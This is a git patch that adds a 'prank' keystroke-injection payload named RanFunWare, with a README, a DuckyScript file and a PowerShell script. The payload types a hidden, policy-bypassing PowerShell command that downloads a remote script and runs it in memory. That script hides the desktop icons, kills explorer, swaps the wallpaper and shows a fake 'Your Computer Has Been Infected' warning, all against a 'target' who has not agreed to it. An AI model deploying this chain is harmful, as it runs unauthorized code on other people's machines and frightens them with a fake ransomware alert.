From a51949685ea110bd5ce35faaac9fed835f179723 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Mon, 10 Oct 2022 15:00:03 -0400 Subject: [PATCH] Add files via upload --- payloads/library/prank/RanFunWare/README.md | 108 ++++++++++++++++++ payloads/library/prank/RanFunWare/payload.txt | 16 +++ payloads/library/prank/RanFunWare/r.ps1 | 70 ++++++++++++ 3 files changed, 194 insertions(+) create mode 100644 payloads/library/prank/RanFunWare/README.md create mode 100644 payloads/library/prank/RanFunWare/payload.txt create mode 100644 payloads/library/prank/RanFunWare/r.ps1 diff --git a/payloads/library/prank/RanFunWare/README.md b/payloads/library/prank/RanFunWare/README.md new file mode 100644 index 0000000..32c5352 --- /dev/null +++ b/payloads/library/prank/RanFunWare/README.md @@ -0,0 +1,108 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# RanFunWare + +A payload to prank your friends into thinking their computer got hit with ransomware. + +## Description + +This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable) + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/prank/RanFunWare/payload.txt b/payloads/library/prank/RanFunWare/payload.txt new file mode 100644 index 0000000..8749016 --- /dev/null +++ b/payloads/library/prank/RanFunWare/payload.txt @@ -0,0 +1,16 @@ +REM Title: RanFunWare + +REM Author: atomiczsec + +REM Description: This payload will prank your target into thinking their machine got hit with ransomware. + +REM Target: Windows 10 + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 \ No newline at end of file diff --git a/payloads/library/prank/RanFunWare/r.ps1 b/payloads/library/prank/RanFunWare/r.ps1 new file mode 100644 index 0000000..b557338 --- /dev/null +++ b/payloads/library/prank/RanFunWare/r.ps1 @@ -0,0 +1,70 @@ +#Hides Desktop Icons +$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" +Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 +Get-Process "explorer"| Stop-Process + +#Changes Background +#URL For the Image of your choice (Wanna Cry Ransomware Background) +$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" + + +Invoke-WebRequest $url -OutFile C:\temp\test.jpg + + +$setwallpapersrc = @" +using System.Runtime.InteropServices; + +public class Wallpaper +{ + public const int SetDesktopWallpaper = 20; + public const int UpdateIniFile = 0x01; + public const int SendWinIniChange = 0x02; + [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] + private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); + public static void SetWallpaper(string path) + { + SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); + } +} +"@ +Add-Type -TypeDefinition $setwallpapersrc + +[Wallpaper]::SetWallpaper("C:\temp\test.jpg") + + +#Pop Up Message + +function MsgBox { + +[CmdletBinding()] +param ( +[Parameter (Mandatory = $True)] +[Alias("m")] +[string]$message, + +[Parameter (Mandatory = $False)] +[Alias("t")] +[string]$title, + +[Parameter (Mandatory = $False)] +[Alias("b")] +[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] +[string]$button, + +[Parameter (Mandatory = $False)] +[Alias("i")] +[ValidateSet('None','Hand','Question','Warning','Asterisk')] +[string]$image +) + +Add-Type -AssemblyName PresentationCore,PresentationFramework + +if (!$title) {$title = " "} +if (!$button) {$button = "OK"} +if (!$image) {$image = "None"} + +[System.Windows.MessageBox]::Show($message,$title,$button,$image) + +} + +MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning